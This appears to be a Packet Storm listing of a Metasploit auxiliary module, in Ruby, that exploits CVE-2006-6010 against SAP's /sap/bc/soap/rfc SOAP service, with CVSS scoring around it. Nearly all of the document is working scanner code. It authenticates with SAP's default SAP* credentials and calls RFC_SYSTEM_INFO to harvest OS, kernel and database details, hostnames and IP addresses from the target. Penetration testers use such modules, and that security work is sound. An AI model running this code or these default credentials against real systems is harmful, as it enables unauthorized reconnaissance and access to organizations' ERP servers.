Lucene search

K
packetstormNmonkee, ChrisJohnRiley, Agnivesh Sathasivam, metasploit.comPACKETSTORM:180986
HistorySep 01, 2024 - 12:00 a.m.

SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering

2024-09-0100:00:00
nmonkee, ChrisJohnRiley, Agnivesh Sathasivam, metasploit.com
packetstormsecurity.com
15
sap
soap
rfc_system_info
sensitive information gathering
operating system
version
ip address
metasploit
http client

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

7.4

Confidence

Low

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
##  
# This module is based on, inspired by, or is a port of a plugin available in  
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -  
# http://www.onapsis.com/research-free-solutions.php.  
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts  
# in producing the Metasploit modules and was happy to share his knowledge and  
# experience - a very cool guy. I'd also like to thank Chris John Riley,  
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and  
# provided excellent feedback. Some people just seem to enjoy hacking SAP :)  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering',  
'Description' => %q{  
This module makes use of the RFC_SYSTEM_INFO Function to obtain the operating  
system version, SAP version, IP address and other information through the use of  
the /sap/bc/soap/rfc SOAP service.  
},  
'References' =>  
[  
[ 'CVE', '2006-6010' ],  
[ 'URL', 'https://labs.f-secure.com/tools/sap-metasploit-modules/' ]  
],  
'Author' =>  
[  
'Agnivesh Sathasivam',  
'nmonkee',  
'ChrisJohnRiley' # module cleanup / streamlining  
],  
'License' => MSF_LICENSE  
)  
register_options(  
[  
Opt::RPORT(8000),  
OptString.new('CLIENT', [true, 'SAP Client ', '001']),  
OptString.new('HttpUsername', [true, 'Username', 'SAP*']),  
OptString.new('HttpPassword', [true, 'Password', '06071992']),  
])  
end  
  
def extract_field(data, elem)  
if data =~ /<#{elem}>([^<]+)<\/#{elem}>/i  
return $1  
end  
nil  
end  
  
def report_note_sap(type, data, value)  
# create note  
report_note(  
:host => rhost,  
:port => rport,  
:proto => 'tcp',  
:sname => 'sap',  
:type => type,  
:data => data + value  
) if data  
# update saptbl for output  
@saptbl << [ data, value ]  
end  
  
def run_host(ip)  
client = datastore['CLIENT']  
data = '<?xml version="1.0" encoding="utf-8" ?>'  
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'  
data << '<env:Body>'  
data << '<n1:RFC_SYSTEM_INFO xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'  
data << '<CURRENT_RESOURCES xsi:nil="true"></CURRENT_RESOURCES>'  
data << '<MAXIMAL_RESOURCES xsi:nil="true"></MAXIMAL_RESOURCES>'  
data << '<RECOMMENDED_DELAY xsi:nil="true"></RECOMMENDED_DELAY>'  
data << '<RFCSI_EXPORT xsi:nil="true"></RFCSI_EXPORT>'  
data << '</n1:RFC_SYSTEM_INFO>'  
data << '</env:Body>'  
data << '</env:Envelope>'  
print_status("[SAP] #{ip}:#{rport} - sending SOAP RFC_SYSTEM_INFO request")  
begin  
res = send_request_cgi({  
'uri' => '/sap/bc/soap/rfc',  
'method' => 'POST',  
'data' => data,  
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}",  
'ctype' => 'text/xml; charset=UTF-8',  
'encode_params' => false,  
'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),  
'headers' =>{  
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',  
},  
'vars_get' => {  
'sap-client' => datastore['CLIENT'],  
'sap-language' => 'EN'  
}  
})  
if res and res.code != 500 and res.code != 200  
# to do - implement error handlers for each status code, 404, 301, etc.  
print_error("[SAP] #{ip}:#{rport} - something went wrong!")  
return  
elsif not res  
print_error("[SAP] #{ip}:#{rport} - Server did not respond")  
return  
end  
rescue ::Rex::ConnectionError  
print_error("[SAP] #{ip}:#{rport} - Unable to connect")  
return  
end  
  
print_status("[SAP] #{ip}:#{rport} - Response received")  
  
# create table for output  
@saptbl = Msf::Ui::Console::Table.new(  
Msf::Ui::Console::Table::Style::Default,  
'Header' => "[SAP] SOAP RFC_SYSTEM_INFO",  
'Prefix' => "\n",  
'Postfix' => "\n",  
'Indent' => 1,  
'Columns' =>[ "Key", "Value" ]  
)  
  
response = res.body  
  
# extract data from response body  
rfcproto = extract_field(response, 'rfcproto')  
rfcchartyp = extract_field(response, 'rfcchartyp')  
rfcinttyp = extract_field(response, 'rfcinttyp')  
rfcflotyp = extract_field(response, 'rfcflotyp')  
rfcdest = extract_field(response, 'rfcdest')  
rfchost = extract_field(response, 'rfchost')  
rfcsysid = extract_field(response, 'rfcsysid')  
rfcdbhost = extract_field(response, 'rfcdbhost')  
rfcdbsys = extract_field(response, 'rfcdbsys')  
rfcsaprl = extract_field(response, 'rfcsaprl')  
rfcmach = extract_field(response, 'rfcmach')  
rfcopsys = extract_field(response, 'rfcopsys')  
rfctzone = extract_field(response, 'rfctzone')  
rfcdayst = extract_field(response, 'rfcdayst')  
rfcipaddr = extract_field(response, 'rfcipaddr')  
rfckernrl = extract_field(response, 'rfckernrl')  
rfcipv6addr = extract_field(response, 'rfcipv6addr')  
  
# report notes / create saptbl output  
report_note_sap('sap.version.release','Release Status of SAP System: ',rfcsaprl) if rfcsaprl  
report_note_sap('sap.version.rfc_log','RFC Log Version: ',rfcproto) if rfcproto  
report_note_sap('sap.version.kernel','Kernel Release: ',rfckernrl) if rfckernrl  
report_note_sap('system.os','Operating System: ',rfcopsys) if rfcopsys  
report_note_sap('sap.db.hostname','Database Host: ',rfcdbhost) if rfcdbhost  
report_note_sap('sap.db_system','Central Database System: ',rfcdbsys) if rfcdbsys  
report_note_sap('system.hostname','Hostname: ',rfchost) if rfchost  
report_note_sap('system.ip.v4','IPv4 Address: ',rfcipaddr) if rfcipaddr  
report_note_sap('system.ip.v6','IPv6 Address: ',rfcipv6addr) if rfcipv6addr  
report_note_sap('sap.instance','System ID: ',rfcsysid) if rfcsysid  
report_note_sap('sap.rfc.destination','RFC Destination: ',rfcdest) if rfcdest  
report_note_sap('system.timezone','Timezone (diff from UTC in seconds): ',rfctzone.gsub(/\s+/, "")) if rfctzone  
report_note_sap('system.charset','Character Set: ',rfcchartyp) if rfcchartyp  
report_note_sap('sap.daylight_saving_time','Daylight Saving Time: ',rfcdayst) if rfcdayst  
report_note_sap('sap.machine_id','Machine ID: ',rfcmach.gsub(/\s+/,"")) if rfcmach  
  
if rfcinttyp == 'LIT'  
report_note_sap('system.endianness','Integer Format: ', 'Little Endian')  
elsif rfcinttyp  
report_note_sap('system.endianness','Integer Format: ', 'Big Endian')  
end  
  
if rfcflotyp == 'IE3'  
report_note_sap('system.float_type','Float Type Format: ', 'IEEE')  
elsif rfcflotyp  
report_note_sap('system.float_type','Float Type Format: ', 'IBM/370')  
end  
  
# output table  
print(@saptbl.to_s)  
  
end  
end  
`

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

7.4

Confidence

Low

Related for PACKETSTORM:180986